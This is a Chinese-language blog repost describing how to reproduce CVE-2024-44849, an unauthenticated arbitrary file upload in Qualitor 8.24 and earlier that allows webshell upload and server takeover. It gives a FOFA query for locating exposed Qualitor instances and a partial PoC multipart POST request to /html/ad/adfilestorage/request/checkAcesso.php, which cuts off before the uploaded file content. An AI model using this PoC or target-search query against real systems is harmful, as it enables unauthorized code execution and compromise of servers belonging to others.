自学内容网 自学内容网

Qualitor checkAcesso.php 任意文件上传漏洞复现(CVE-2024-44849)

0x01 漏洞概述

Qualitor 8.24及之前版本存在任意文件上传漏洞,未经身份验证远程攻击者可利用该漏洞代码执行,写入WebShell,进一步控制服务器权限。

0x02 复现环境

FOFA:app="Qualitor-Web"

80557ac0230340b8bb6854e0b2a362a2.png

0x03 漏洞复现

PoC

POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849

-----------------------------QUALITORspaceCVEspace2024space44849
Content-Disposition: form-data; name="idtipo"

2
-----------------------------QUALITORspaceCVEspace2024space44849
Content-Disposition: form-data; name="nmfilestorage"


----

原文地址:https://blog.csdn.net/qq_41904294/article/details/142778587

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!